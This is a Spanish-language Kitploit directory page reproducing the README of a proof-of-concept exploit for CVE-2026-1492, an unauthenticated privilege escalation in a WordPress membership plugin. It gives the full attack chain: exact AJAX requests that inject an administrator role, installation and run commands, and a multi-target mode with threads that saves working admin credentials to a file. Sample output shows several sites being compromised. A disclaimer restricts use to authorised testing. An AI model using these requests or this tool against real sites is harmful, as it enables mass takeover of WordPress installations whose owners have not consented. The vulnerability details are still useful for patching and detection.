Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-1492 — User Registration & Membership <= 5.1.2 - Escalada de privilegios no autenticada a través del registro de membresía | Kitploit
Herramientas/GitHubGitHub/nxploited/cve-2026-1492
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónRed Teaming
GitHubnxploited/cve-2026-1492

CVE-2026-1492

User Registration & Membership <= 5.1.2 - Escalada de privilegios no autenticada a través del registro de membresía

Ver Repositorio
2hace 4 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-1492

User Registration & Membership <= 5.1.2 - Escalada de Privilegios no Autenticada mediante Registro de Membresía

Typing SVG


🔴 Resumen de la Vulnerabilidad

CVE-2026-1492 — Escalada de Privilegios no Autenticada mediante Registro de Membresía

Descripción:
El plugin User Registration & Membership para WordPress es vulnerable a una Escalada de Privilegios no Autenticada en todas las versiones hasta la 5.1.2 inclusive. La vulnerabilidad se origina en el manejador AJAX user_registration_membership_register_member, que acepta un valor de role proporcionado por el usuario durante el proceso de registro de membresía sin imponer ninguna lista blanca del lado del servidor ni comprobación de capacidades. Un atacante remoto completamente no autenticado puede construir una cadena de peticiones AJAX de varios pasos — primero registrando una nueva cuenta de usuario y luego enviando una llamada maliciosa register_member con "role": "administrator" inyectado en la carga útil JSON members_data — para crear silenciosamente una cuenta de Administrador de WordPress con plenos privilegios. Esto resulta en el compromiso total de la instalación de WordPress afectada sin requerir ninguna interacción del usuario.


🛠️ Descripción de la Herramienta

Este es un script de explotación de Prueba de Concepto (PoC) que implementa una cadena de ataque completa con seguimiento de estado contra sitios WordPress que ejecutan una versión vulnerable del plugin User Registration & Membership. La herramienta realiza una explotación inteligente en varias etapas con descubrimiento automático, extracción de planes, recolección de nonces, registro de doble flujo, inyección de roles y verificación de administrador.

🔗 Cadena de Ataque Completa

root@kitploit:~
[Discovery Phase]
  GET /membership-pricing/  →  Extract membership plan IDs
  GET /registration/        →  Extract form fields, nonces, AJAX params

        ↓

[Registration Phase — Flow A]
  POST /wp-admin/admin-ajax.php
  action=user_registration_user_form_submit
  → Register new user account

        ↓

[Role Injection Phase — Flow A]
  POST /wp-admin/admin-ajax.php
  action=user_registration_membership_register_member
  members_data={"role":"administrator", "membership":"<id>", ...}
  → Inject administrator role into newly created account

        ↓

[Admin Verification Phase]
  GET /wp-admin/  →  Check for admin dashboard indicators
  GET /wp-admin/plugin-install.php  →  Confirm plugin-install access

        ↓

[Fallback Override — Flow B]
  If Flow A admin check fails → repeat with fresh username/email

        ↓

[Write to Nx_admin.txt]
  Format: https://target.com/wp-login.php user:<u> pass:<p>

📋 Requisitos

Requisitos del Sistema

  • Python 3.8 o superior
  • Linux / Windows / macOS

Dependencias de Python

root@kitploit:~
pip install requests urllib3 rich

O mediante el archivo de requisitos:

root@kitploit:~
pip install -r requirements.txt

requirements.txt:

root@kitploit:~
requests>=2.28.0
urllib3>=1.26.0
rich>=13.0.0

🚀 Instalación

root@kitploit:~
# Clone the repository
git clone https://github.com/Nxploited/CVE-2026-1492.git
cd CVE-2026-1492

# Install dependencies
pip install -r requirements.txt

# Run the tool
python3 CVE-2026-1492.py

⚙️ Uso

Ejecución Básica

root@kitploit:~
python3 CVE-2026-1492.py

La herramienta utiliza una interfaz de terminal totalmente interactiva basada en Rich. Todos los parámetros se solicitan en tiempo de ejecución.


🗂️ Formato de la Lista de Objetivos

Cree un archivo de texto plano (por defecto: list.txt) con un objetivo por línea:

root@kitploit:~
https://target1.com
https://target2.com
http://target3.com/wordpress

🖥️ Solicitudes Interactivas

root@kitploit:~
Targets file [list.txt]: list.txt

Credentials:
  - Username prefix: random number is added per site (fresh user per target/plan/flow)
  - Email: if left empty, it will be built from the username automatically
  - Password: fixed for all sites

Username prefix (optional): Nxploited
Email (optional): 
Password [Nx_12999]: Nx_12999
Threads [3]: 5
HTTP timeout (seconds) [10]: 10

🔬 Análisis Profundo de la Explotación

Paso 1 — Descubrimiento

La herramienta descubre y analiza automáticamente:

Paso 2 — AJAX de Registro

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

action=user_registration_user_form_submit
&form_data=[{"field_name":"user_login","value":"Nxploited_A_482910",...}]
&form_id=1
&ur_frontend_form_nonce=<extracted_nonce>
&security=<extracted_security>
&is_membership_active=<membership_id>

Paso 3 — Inyección de Rol AJAX (La Llamada Vulnerable)

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

action=user_registration_membership_register_member
&members_data={"membership":"<id>","payment_method":"free","role":"administrator","username":"Nxploited_A_482910",...}
&form_response={...}
&_wpnonce=<membership_nonce>
&security=<membership_nonce>

⚠️ El servidor acepta el campo role del cliente sin ninguna validación de lista blanca — esta es la causa raíz de CVE-2026-1492.

Paso 4 — Verificación de Administrador

La herramienta abre una sesión nueva, inicia sesión con las credenciales recién creadas y sondea:


📁 Archivos de Salida

��� Formato de Salida del Administrador

root@kitploit:~
https://target.com/wp-login.php user:Nxploited_A_482910|pass:Nx_12999

🖥️ Ejemplo de Salida del Terminal

root@kitploit:~
╔══════════════════════════════════════════════════════════════════════╗
║   CVE-2026-1492  |  User Registration & Membership — Admin PoC      ║
║   By: Nxploited  |  GitHub: github.com/Nxploited  |  @KNxploited    ║
╚══════════════════════════════════════════════════════════════════════╝

[INFO]   https://target.com
[OK]     https://target.com  |  REG-A-OK  user:Nxploited_A_482910 mem:3
[OK]     https://target.com  |  MEM-A-OK  membership A (role=administrator payload) sent
[OK]     https://target.com  |  ADMIN-A   user:Nxploited_A_482910 pass:Nx_12999 mem:3

┌─────────────────────────────��───────────────────────────────────────────────┐
│  Target                  │  Status           │  Note                        │
├─────────────────────────────────────────────────────────────────────────────┤
│  https://target.com      │  ✅ ADMIN-A       │  user:Nxploited_A_482910 ... │
│  https://target2.com     │  MEM-B-FAIL       │  membership not configured   │
│  https://target3.com     │  DEAD             │  connection error            │
└─────────────────────────────────────────────────────────────────────────────┘

📊 Referencia de Códigos de Estado


📡 Contacto y Autor

Por: Nxploited (Khaled Alenazi)

 


⚠️ Aviso Legal

ESTA HERRAMIENTA SE PROPORCIONA ÚNICAMENTE CON FINES EDUCATIVOS Y DE INVESTIGACIÓN DE SEGURIDAD AUTORIZADA.

El autor, Nxploited (Khaled Alenazi), y todos los colaboradores de este proyecto no aprueban, no respaldan ni asumen ninguna responsabilidad por el uso indebido de esta herramienta o por cualquier daño causado por el uso de este software contra sistemas para los cuales usted no tiene autorización escrita explícita.

  • ✅ Permitido: Uso en sistemas propios o para los que se le haya otorgado permiso escrito explícito para realizar pruebas.
  • ❌ Prohibido: Uso contra cualquier sistema sin autorización escrita explícita previa del propietario del sistema.

El acceso no autorizado a sistemas informáticos es ilegal y está penado por las leyes aplicables, incluidas, entre otras, la Computer Fraud and Abuse Act (CFAA), la Computer Misuse Act (CMA) y la legislación equivalente en todo el mundo.

Al utilizar esta herramienta, usted acepta la responsabilidad única y total por sus acciones y confirma que tiene la autoridad legal para probar los sistemas objetivo.

El autor no asume ninguna responsabilidad por daños directos, indirectos, incidentales o consecuenciales que surjan del uso o uso indebido de este software.


© 2026 Nxploited (Khaled Alenazi) — Solo para investigación de seguridad autorizada.

Descargar herramienta
CampoDetalles
ID CVECVE-2026-1492
GravedadCRÍTICA — Puntuación CVSS v3.1: 9.8
VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CNAWordfence
Software AfectadoUser Registration & Membership — Constructor de Formularios de Registro Personalizados, Formulario de Inicio de Sesión Personalizado, Perfil de Usuario, Restricción de Contenido y Plugin de Membresía para WordPress
Versiones AfectadasTodas las versiones hasta la 5.1.2 inclusive
Tipo de VulnerabilidadGestión de Privilegios Incorrecta — Creación de Cuenta de Administrador no Autenticada
Autenticación RequeridaNinguna
CWECWE-269: Gestión Inadecuada de Privilegios
ObjetivoQué se Extrae
/membership-pricing/IDs de planes de membresía, enlaces a la página de registro
/registration/Campos del formulario, nonces, URLs AJAX, entradas de radio de membresía
Objeto JS user_registration_paramsajax_url, nonce security, metadatos del formulario
ur_membership_frontend_localized_dataNonce específico de membresía, endpoint AJAX
EndpointIndicador Comprobado
/wp-admin/adminmenu, wp-admin-bar, manage_options
/wp-admin/users.phpusers.php
/wp-admin/plugin-install.phpupload-plugin, plugin-install-tab
ArchivoDescripción
Nx_admin.txt✅ Cuentas de administrador confirmadas
membership_success_log.txtTodas las llamadas exitosas de inyección de rol de membresía
discovery_log.txtDatos completos de descubrimiento por objetivo (nonces, IDs, campos)
registration_log.txtTodas las peticiones y respuestas AJAX de registro
membership_log.txtTodas las peticiones y respuestas AJAX de membresía
admin_check_log.txtIntentos de inicio de sesión y resultados de verificación de administrador
EstadoColorSignificado
ADMIN-A / ADMIN-B🟢 VerdeAdministrador confirmado — Flujo A o B
ADMIN-A-OVERRIDE🟢 VerdeAdministrador confirmado tras el intento de anulación
REG-A-FAIL / REG-B-FAIL🟡 AmarilloEl AJAX de registro devolvió un fallo
MEM-A-FAIL / MEM-B-FAIL🟣 MagentaFalló la llamada de inyección de rol de membresía
REG-PENDING-A/B⚫ OscuroLa cuenta requiere verificación por correo electrónico o aprobación del administrador
NO-MEM-ID⚫ OscuroNo se encontró el ID del plan de membresía en el objetivo
NO-UR-NONCE⚫ OscuroEl nonce de registro no es extraíble
NO-ADMIN⚫ OscuroMembresía correcta pero acceso de administrador no confirmado
TIMEOUT⚫ OscuroTiempo de espera HTTP agotado
DEAD⚫ OscuroError de conexión — sitio inaccesible
ERROR🔴 RojoExcepción inesperada